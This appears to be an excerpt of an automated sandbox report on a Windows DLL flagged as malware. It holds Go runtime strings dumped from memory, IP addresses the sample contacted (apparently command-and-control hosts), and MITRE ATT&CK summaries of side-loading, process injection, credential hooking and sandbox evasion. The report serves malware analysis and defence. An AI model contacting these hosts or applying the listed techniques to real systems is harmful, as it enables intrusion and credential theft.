ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
Source: rundll32.exe, 00000004.00000002.3546365132.000000006B46B000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
Source: rundll32.exe, 00000005.00000002.2007679967.000000006B46B000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
Source: rundll32.exe, 00000006.00000002.3544673830.000000006B46B000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
Source: rundll32.exe, 00000007.00000002.2047988912.000000006B46B000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht

Source: Joe Sandbox View	IP Address: 91.142.74.28 91.142.74.28
Source: Joe Sandbox View	IP Address: 77.238.229.63 77.238.229.63

Source: Joe Sandbox View	ASN Name: VTSL1-ASRU VTSL1-ASRU
Source: Joe Sandbox View	ASN Name: TELERU-ASRU TELERU-ASRU
Source: Joe Sandbox View	ASN Name: VDSINA-ASRU VDSINA-ASRU
Source: Joe Sandbox View	ASN Name: TELERU-ASRU TELERU-ASRU

Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.90.9
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.90.9
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.90.9
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.90.9
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.90.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.90.9
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.90.9
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.90.9
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.90.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.90.9
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.90.9
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.90.9
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.90.9
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.90.9
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.90.9
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.90.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.90.9
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.90.9
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.90.9
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.90.9
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.90.9
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 94.103.90.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\config

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Memory Usage

Windows Analysis Report
SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll